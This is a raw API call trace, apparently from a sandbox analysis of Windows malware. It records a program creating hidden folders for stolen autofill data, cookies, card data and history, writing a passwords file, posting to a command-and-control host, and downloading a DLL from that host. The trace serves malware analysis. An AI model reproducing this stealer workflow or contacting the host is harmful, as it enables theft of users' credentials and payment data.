(lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.859] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.860] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x374918 [0088.860] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.860] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.860] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0088.861] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x374930 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.861] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0088.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ef48 | out: lpSystemTimeAsFileTime=0x18ef48*(dwLowDateTime=0xa259c860, dwHighDateTime=0x1d5d6b4)) [0088.983] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x2) returned 0x1dc12b8 [0088.983] GetTickCount () returned 0x115ba99 [0088.983] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn"), lpSecurityAttributes=0x0) returned 1 [0088.985] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn")) returned 1 [0088.985] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc12f0 [0088.986] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files"), lpSecurityAttributes=0x0) returned 1 [0088.986] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0088.986] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x7a120) returned 0x1c60048 [0088.996] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x374be8 [0088.996] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.165] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ee04, dwBufferLength=0x4) returned 1 [0089.165] InternetConnectA (hInternet=0xcc0004, lpszServerName="biderkomoso.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0089.166] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0089.166] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/517", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0089.167] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x80) returned 0x1dc1340 [0089.167] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0089.167] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0089.167] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0089.167] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0089.167] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc1340 | out: hHeap=0x1dc0000) returned 1 [0089.167] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc1340 [0089.167] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x47) returned 0x1dc1378 [0089.167] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc1340 | out: hHeap=0x1dc0000) returned 1 [0089.167] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0089.168] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0089.168] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x1c60048*, dwOptionalLength=0x19) returned 1 [0092.940] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x2e, lpBuffer=0x18ee78, lpdwBufferLength=0x18ee08, lpdwIndex=0x0 | out: lpBuffer=0x18ee78, lpdwBufferLength=0x18ee08, lpdwIndex=0x0) returned 0 [0092.940] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x7800) returned 0x1dc29a8 [0092.941] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0092.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1dc29a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18ec84 | out: lpBuffer=0x1dc29a8*, lpdwNumberOfBytesRead=0x18ec84*=0x15d) returned 1 [0092.944] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1dc2b05, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18ec84 | out: lpBuffer=0x1dc2b05*, lpdwNumberOfBytesRead=0x18ec84*=0x0) returned 1 [0092.945] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x18ece0, lpdwBufferLength=0x18ec84, lpdwIndex=0x0 | out: lpBuffer=0x18ece0, lpdwBufferLength=0x18ec84, lpdwIndex=0x0) returned 0 [0092.945] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0092.945] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc1378 | out: hHeap=0x1dc0000) returned 1 [0092.945] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0092.945] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0092.945] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc1318 | out: hHeap=0x1dc0000) returned 1 [0092.945] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.946] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x160) returned 0x1dc12f0 [0092.946] GetLastError () returned 0x2f76 [0092.946] SetLastError (dwErrCode=0x2f76) [0092.946] GetLastError () returned 0x2f76 [0092.946] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files\\Autofill" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\autofill"), lpSecurityAttributes=0x0) returned 1 [0092.946] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.947] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x40) returned 0x1dc12f0 [0092.947] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files\\Cookies" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\cookies"), lpSecurityAttributes=0x0) returned 1 [0092.947] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.947] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x40) returned 0x1dc12f0 [0092.947] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files\\CC" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\cc"), lpSecurityAttributes=0x0) returned 1 [0092.947] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.947] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x40) returned 0x1dc12f0 [0092.947] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files\\History" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\history"), lpSecurityAttributes=0x0) returned 1 [0092.948] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.948] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x40) returned 0x1dc12f0 [0092.948] CreateDirectoryA (lpPathName="C:\\ProgramData\\GN3NF9QJWJUOWYC2BZTE39QWN\\files\\Downloads" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\downloads"), lpSecurityAttributes=0x0) returned 1 [0092.948] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.948] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc12f0 [0092.948] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc1328 [0092.948] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0092.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ed64 | out: lpSystemTimeAsFileTime=0x18ed64*(dwLowDateTime=0xa4572ea0, dwHighDateTime=0x1d5d6b4)) [0092.948] GetLastError () returned 0x2f76 [0092.949] GetTimeZoneInformation (in: lpTimeZoneInformation=0x48a598 | out: lpTimeZoneInformation=0x48a598) returned 0x2 [0092.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x488928, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18ecdc | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18ecdc) returned 26 [0092.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x488968, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18ecdc | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18ecdc) returned 26 [0092.951] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x18) returned 0x1dc12f0 [0092.952] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x18) returned 0x1dc1360 [0092.952] CreateFileA (lpFileName="files\\passwords.txt" (normalized: "c:\\programdata\\gn3nf9qjwjuowyc2bzte39qwn\\files\\passwords.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18ec38, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0092.954] GetFileType (hFile=0x348) returned 0x1 [0092.954] CloseHandle (hObject=0x348) returned 1 [0092.954] CreateDirectoryA (lpPathName="C:\\ProgramData\\" (normalized: "c:\\programdata"), lpSecurityAttributes=0x0) returned 0 [0092.954] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x7a120) returned 0x1cda170 [0092.962] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x37e950 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] lstrlenA (lpString="K2UEGA0UUNGLFNM") returned 15 [0092.962] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x20) returned 0x1dc1380 [0092.963] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x20) returned 0x1dc13a8 [0092.963] GetLastError () returned 0xb7 [0092.963] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0092.963] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ed08, dwBufferLength=0x4) returned 1 [0092.963] InternetConnectA (hInternet=0xcc0004, lpszServerName="biderkomoso.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0092.963] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/freebl3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0092.963] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x80) returned 0x1dc13d0 [0092.963] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0092.963] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0092.963] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0092.963] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0092.963] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc13d0 | out: hHeap=0x1dc0000) returned 1 [0092.963] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0093.315] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x7800) returned 0x1d54298 [0093.315] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.315] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d54298, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d54298*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.341] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d54680, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d54680*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.342] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d54a68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d54a68*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.368] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d54e50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d54e50*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.368] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d55238, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d55238*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.368] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d55620, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d55620*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d55a08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: 